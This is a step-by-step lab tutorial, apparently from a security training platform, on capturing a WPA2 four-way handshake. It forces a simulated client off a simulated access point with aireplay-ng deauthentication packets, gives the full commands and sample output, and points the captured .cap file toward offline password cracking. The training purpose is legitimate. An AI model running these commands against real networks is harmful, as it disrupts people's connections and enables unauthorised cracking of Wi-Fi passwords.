Introduction
Welcome to this lab on forcing a WPA handshake capture. The WPA/WPA2 four-way handshake is a critical piece of data required to attempt to crack a Wi-Fi network's password. While you can passively wait for a device to connect to the network to capture this handshake, this can be time-consuming.
A more active approach is to force a currently connected client to disconnect and then immediately reconnect. This process is called a deauthentication (or "deauth") attack. When the client reconnects, it performs the four-way handshake, which you can then capture.
In this lab, you will use aireplay-ng, a powerful tool from the aircrack-ng suite, to perform a deauthentication attack against a simulated Wi-Fi client. This will allow you to reliably capture the WPA handshake for analysis. Our lab environment has been pre-configured with a virtual wireless access point (AP) named MyTestAP and a connected client.
Identify an Associated Client from an airodump-ng Scan
In this step, you will prepare your wireless interface for monitoring and then use airodump-ng to find the target access point and its connected client.
First, you need to put one of your virtual wireless interfaces into monitor mode. This mode allows the interface to capture all Wi-Fi traffic in the air, not just traffic addressed to it. We will use the wlan1 interface.
Execute the following command to start monitor mode on wlan1:
sudo airmon-ng start wlan1
This command will create a new monitor interface, typically named wlan1mon. You should see output confirming the mode has been enabled.
PHY Interface Driver Chipset
phy0 wlan0 mac80211_hwsim Software simulator
phy1 wlan1 mac80211_hwsim Software simulator
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
Now, run airodump-ng on the new monitor interface (wlan1mon) to start scanning. We will use the -w flag to write the captured packets to a file named capture, and we'll specify the BSSID and channel of our target AP to focus the scan. The BSSID for our simulated AP is 02:00:00:00:01:00 and it's on channel 6.
sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon
Let airodump-ng run. You will see a screen that updates in real-time. The top part lists nearby access points, and the bottom part lists clients connected to them. You should see our AP, MyTestAP, and one client connected to it.
The output will look similar to this:
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 10 5 0 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -35 0- 1 0 5
From this output, identify and note:
- BSSID:
02:00:00:00:01:00(The MAC address of the AP). - STATION:
02:00:00:00:02:00(The MAC address of the connected client).
Keep this terminal running. You will need it to confirm the handshake capture later.
Open a New Terminal for the Deauthentication Attack
In this step, you will open a new terminal window. The airodump-ng command from the previous step must continue running in the first terminal to listen for the WPA handshake. The deauthentication attack will be launched from a second, separate terminal.
To open a new terminal, click the + icon in the terminal tab bar at the top of the terminal window.
Once the new terminal is open, you will be at the ~/project directory, ready to execute the attack command in the next step. All subsequent commands for the attack itself should be run in this new terminal.
Construct the aireplay-ng Deauth Command with --deauth
In this step, you will construct the aireplay-ng command that will perform the deauthentication attack. You will use the information you gathered in Step 1.
The basic syntax for a deauth attack with aireplay-ng is:
aireplay-ng --deauth <number_of_packets> -a <AP_BSSID> -c <Client_STATION> <interface>
Let's break down the components:
--deauth: This flag specifies the deauthentication attack mode.<number_of_packets>: This is the number of deauth packets to send. Sending a small burst, like5, is usually sufficient to disconnect the client.-a <AP_BSSID>: This specifies the MAC address of the target Access Point. From Step 1, this is02:00:00:00:01:00.-c <Client_STATION>: This specifies the MAC address of the client you want to disconnect. From Step 1, this is02:00:00:00:02:00.<interface>: This is your wireless interface in monitor mode, which iswlan1mon.
Now, assemble the full command in your new terminal. It should look exactly like this:
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
Do not press Enter yet. In the next step, you will execute this command.
Execute the Attack Targeting the Client and AP
In this step, you will execute the command you just constructed to launch the attack.
In your second terminal window, press Enter to run the aireplay-ng command.
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
The tool will immediately start sending deauthentication packets. The output will show the time and that it is sending directed deauths to the client.
The output will look like this:
10:35:10 Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...
The attack is very fast. As soon as you execute the command, the targeted client will be disconnected from the network and will immediately try to reconnect. This reconnection process is what generates the WPA handshake we want to capture.
Quickly switch back to your first terminal (the one running airodump-ng) to observe the result in the next step.
Confirm Handshake Capture in the airodump-ng Window
In this step, you will confirm that the deauthentication attack was successful by checking for the WPA handshake message in your airodump-ng window.
Switch back to your first terminal. If the attack worked, you will see a new message in the top-right corner of the airodump-ng display:
WPA handshake: 02:00:00:00:01:00
This message confirms that airodump-ng has successfully intercepted and recorded the four-way handshake for the specified BSSID.
CH 6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 48 82 1 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -36 0- 1 0 75
Now that you have the handshake, you can stop the capture. Press Ctrl+C in the airodump-ng terminal to stop it.
Because you used the -w capture flag in Step 1, airodump-ng saved the captured traffic to files in your current directory (~/project). List the files to see the results.
ls -l
You should see several files starting with capture, including capture-01.cap. This .cap file contains the raw packet data, including the WPA handshake you just captured.
-rw-r--r-- 1 root root 450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root root 892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root root 634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root root 128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex 121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex 52 Oct 27 10:28 wpa_supplicant.conf
The capture-01.cap file is the prize. It can now be used with password cracking tools like aircrack-ng to try and discover the network's pre-shared key.
Summary
Congratulations on completing this lab! You have successfully performed a deauthentication attack to force and capture a WPA handshake.
In this lab, you learned how to:
- Put a wireless interface into monitor mode using
airmon-ng. - Scan for and identify a target AP and client with
airodump-ng. - Construct and execute a deauthentication attack using
aireplay-ng. - Confirm the capture of the WPA handshake and locate the resulting
.capfile.
This is a fundamental skill in wireless network security testing. The captured handshake file is the key ingredient for the next phase: offline password cracking using a tool like aircrack-ng and a comprehensive wordlist.